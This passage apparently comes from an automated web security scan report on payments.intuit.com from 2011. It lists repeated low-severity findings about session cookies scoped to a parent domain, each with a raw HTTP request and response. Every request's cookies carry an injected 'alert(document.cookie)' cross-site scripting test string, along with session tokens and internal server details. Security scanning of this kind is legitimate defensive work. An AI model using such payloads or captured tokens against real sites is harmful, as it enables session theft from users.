Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rWG2KKyS6ZfhueJSH9YbTQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955E2760A0805192AA117E38F42E01B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96334


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.13. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UfcQ4hB5tvap88Kpn1as6w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F0AB0A0805192AA117E3D78B52E9
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109298


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.14. http://payments.intuit.com/products/echecks-and-check-processing.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/echecks-and-check-processing.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o03uGIlQhAIMfOgApWkACw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9564B990A0805192AA117E3DCB47029
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145328


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.15. http://payments.intuit.com/products/internet-merchant-accounts.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=1zfYWm-5+sIGHq3lVGsq9A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F7F90A0805192AA117E30C252E9E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116256


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.16. http://payments.intuit.com/products/online-credit-card-processing.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ODpeSNk8Cz5OWAaU70Sg5Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F2B70A0805192AA117E38D1241DA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116043


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.17. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UO8K+W6L-Kr1FIobAgrNlQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955FA3E0A0805192AA117E322CED842
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140253


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.18. http://payments.intuit.com/products/quickbooks-payment-processing.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-4lle2qf4zU7ZQFeZRXKaQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955FA150A0805192AA117E3B9827F1E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100416


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

2.19. http://payments.intuit.com/products/quickbooks-payment-solutions/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 21 Mar 2011 16:53:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=fcbVblmcmlrYMQa1VP-PLQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A9AC0A0805192AA117E33BEA2C01
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&servletResponseTime=1&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: /products/quickbooks-payment-processing.jsp
Connection: close
Content-Length: 7
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1


   

2.20. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

